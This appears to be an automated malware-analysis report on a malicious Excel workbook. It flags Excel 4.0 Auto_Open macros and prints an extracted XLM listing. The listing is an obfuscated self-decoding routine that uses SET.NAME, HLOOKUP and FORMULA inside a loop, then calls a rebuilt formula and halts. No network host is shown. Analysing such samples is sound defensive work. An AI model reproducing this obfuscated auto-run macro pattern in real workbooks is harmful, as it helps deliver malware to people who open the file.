MALICIOUS
140
Risk Score
Heuristics 3
-
Excel 4.0 Auto_Open defined name critical OLE_XLM_AUTOOPEN_DEFINEDNAMEoletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF name can be tokenized or partially opaque to byte-string checks, but the recovered macro listing confirms the workbook has an XLM auto-execution entry.
-
XLM Auto_Open with dangerous formula APIs critical OLE_XLM_DANGEROUS_FNExcel 4.0 macro sheet contains an Auto_Open / Auto_Close entry and dangerous XLM formula APIs that can invoke programs, write files, or transfer control without VBA.
-
Excel 4.0 (XLM) macro sheet present medium OLE_XLM_AUTOOPENWorkbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
xlm_macros.txt |
xlm-macro | oletools.olevba.extract_all_macros (XLM macro listing) | 6754 bytes |
SHA-256: 11e0b4fcb7d90cc81aa867cad6c7819ddbd2c6173b0007d536e8cea9b7cdc1cd |
|||
Preview scriptFirst 1,000 lines of the extracted script
' 0085 14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible - Sheet
' 0085 19 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible - vOIyXsAPuO
' 0018 27 LABEL : Cell Value, String Constant - ARQbYpUVQFEw len=0
' 0018 23 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open len=7 ptgRef3d Sheet!F186
' 0018 24 LABEL : Cell Value, String Constant - gIEmWiDWA len=0
' 0018 24 LABEL : Cell Value, String Constant - gkVZOkLGp len=0
' 0018 26 LABEL : Cell Value, String Constant - HozXKOxbLtj len=0
' 0018 26 LABEL : Cell Value, String Constant - IubqtLcyhsI len=0
' 0018 23 LABEL : Cell Value, String Constant - KsrdjMtF len=0
' 0018 27 LABEL : Cell Value, String Constant - LbdUCPzofBdk len=0
' 0018 23 LABEL : Cell Value, String Constant - MJXKIXke len=0
' 0018 23 LABEL : Cell Value, String Constant - MOAAtEmf len=0
' 0018 27 LABEL : Cell Value, String Constant - mWdaWdLVAhtf len=0
' 0018 24 LABEL : Cell Value, String Constant - oKLKCmzSE len=0
' 0018 24 LABEL : Cell Value, String Constant - olhNEAEOy len=0
' 0018 24 LABEL : Cell Value, String Constant - PzklhioJT len=0
' 0018 26 LABEL : Cell Value, String Constant - qnHWaUhkDaM len=0
' 0018 27 LABEL : Cell Value, String Constant - rsmVkhokXnuE len=0
' 0018 27 LABEL : Cell Value, String Constant - SGYIGxtWCHFI len=0
' 0018 24 LABEL : Cell Value, String Constant - SLKUQURRM len=0
' 0018 25 LABEL : Cell Value, String Constant - uqFIkpIGQr len=0
' 0018 24 LABEL : Cell Value, String Constant - XJdapdXOG len=0
' 0018 23 LABEL : Cell Value, String Constant - yfAlfBwA len=0
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' Sheet,Reference,Formula,Value
' vOIyXsAPuO,F95,"SET.NAME("HozXKOxbLtj",VALUE("0"))",""
' vOIyXsAPuO,F99,"SET.NAME("oKLKCmzSE",HozXKOxbLtj)",""
' vOIyXsAPuO,F101,"SET.NAME("PzklhioJT",HozXKOxbLtj)",""
' vOIyXsAPuO,F106,"SET.NAME("yfAlfBwA",COUNTA(XJdapdXOG))",""
' vOIyXsAPuO,F111,"SET.NAME("qnHWaUhkDaM",COUNTA(SLKUQURRM))",""
' vOIyXsAPuO,F114,[],""
' vOIyXsAPuO,F116,"SET.NAME("rsmVkhokXnuE","")",""
' vOIyXsAPuO,F121,"oKLKCmzSE",""
' vOIyXsAPuO,F125,"SET.NAME("gkVZOkLGp",HLOOKUP("*",XJdapdXOG,oKLKCmzSE,FALSE))",""
' vOIyXsAPuO,F128,"SGYIGxtWCHFI",""
' vOIyXsAPuO,F132,"SET.NAME("MOAAtEmf",HozXKOxbLtj)",""
' vOIyXsAPuO,F136,[],""
' vOIyXsAPuO,F140,"MOAAtEmf",""
' vOIyXsAPuO,F145,"MJXKIXke",""
' vOIyXsAPuO,F147,"IubqtLcyhsI",""
' vOIyXsAPuO,F150,"LbdUCPzofBdk",""
' vOIyXsAPuO,F153,"SET.NAME("mWdaWdLVAhtf",VALUE(HLOOKUP("*",SLKUQURRM,LbdUCPzofBdk,FALSE)))",""
' vOIyXsAPuO,F156,"gIEmWiDWA",""
' vOIyXsAPuO,F159,"rsmVkhokXnuE",""
' vOIyXsAPuO,F163,"PzklhioJT",""
' vOIyXsAPuO,F167,NEXT(),""
' vOIyXsAPuO,F169,"uqFIkpIGQr",""
' vOIyXsAPuO,F173,"SET.NAME("f",INT(T(FORMULA(T(rsmVkhokXnuE)&"",""&T(uqFIkpIGQr)))))",""
' vOIyXsAPuO,F176,"KsrdjMtF",""
' vOIyXsAPuO,F179,NEXT(),""
' vOIyXsAPuO,F184,RETURN(),""
' vOIyXsAPuO,F209,"SET.NAME("olhNEAEOy",F95)",""
' vOIyXsAPuO,F213,"XJdapdXOG",""
' vOIyXsAPuO,F218,"SET.NAME("SLKUQURRM",R96C12)",""
' vOIyXsAPuO,F221,"SET.NAME("KsrdjMtF",229)",""
' vOIyXsAPuO,F223,"SET.NAME("ARQbYpUVQFEw",6)",""
' vOIyXsAPuO,F228,olhNEAEOy(),""
' vOIyXsAPuO,F229,HALT(),""
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.